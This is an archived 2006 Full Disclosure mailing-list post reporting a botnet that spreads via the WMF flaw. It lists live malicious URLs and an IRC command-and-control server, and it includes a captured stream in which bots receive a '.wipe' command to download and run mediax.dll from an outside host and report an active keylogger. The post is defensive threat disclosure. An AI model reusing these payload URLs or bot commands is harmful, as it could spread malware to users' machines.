Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Possible large botnet
From: "Pablo Esterban" <pablo_esterban () hotmail com>
Date: Fri, 20 Jan 2006 06:35:45 +0000

Seems to be a botnet forming with the help of exploiting the recent wmf flaw on the following site. AFAIK malware/adware is referencing this.


************D O  N O T  C L I C K************
http://213.17.233.194/mediabar.wmf
http://213.17.233.194/stat_s3.php
http://213.17.233.194/stat.html
************D O  N O T  C L I C K************

This injects a trojan connecting to 219.240.142.59 on port 44234

44234/tcp open     irc          Unreal ircd
47292/tcp open     irc          Unreal ircd
47296/tcp open     irc          Unreal ircd
54729/tcp open     irc-proxy    psyBNC 2.3.1

Channel stats list around 500 bots and around 1200 connected (may or may not be accurate), however if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started.

The tcp stream below demos the login, and calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k hits on this particular file(!).


NICK *****

USER plnaehe 0 0 :*****

:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...

:irc.foonet.com NOTICE AUTH :*** Found your hostname

:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****

:irc.foonet.com 002 *****:Your host is irc.foonet.com, running version Unreal3.2.3

:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at 17:25:57 KST

:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server

:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG= () %+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server

:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers

:irc.foonet.com 252 *****1 :operator(s) online

:irc.foonet.com 253 *****201 :unknown connection(s)

:irc.foonet.com 254 *****10 :channels formed

:irc.foonet.com 255 *****:I have 1195 clients and 0 servers

:irc.foonet.com 265 *****:Current Local Users: 1195  Max: 5529

:irc.foonet.com 266 *****:Current Global Users: 1195  Max: 1276

:irc.foonet.com 422 *****:MOTD File is missing

*****MODE *****:+iwTxd

USERHOST *****

:irc.foonet.com 302 *****:*****

MODE *****-x+B

JOIN #mrbean5 rowan

PRIVMSG *****:[KEYLOG]: Key logger active.

USERHOST *****

MODE *****-x+B

JOIN #mrbean5 rowan

USERHOST *****

MODE *****-x+B

JOIN #mrbean5 rowan

:irc.foonet.com NOTICE *****:BOTMOTD File not found

*****MODE *****:-x+B

***** JOIN :#mrbean5

:irc.foonet.com 332 *****#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3

:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387

:irc.foonet.com 353 *****@ #mrbean5 *****

:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.

*****PRIVMSG *****:[KEYLOG]: Key logger active.

:irc.foonet.com 302 *****

:irc.foonet.com 302 *****

PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.

:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)

PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.

PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.

:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)

:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault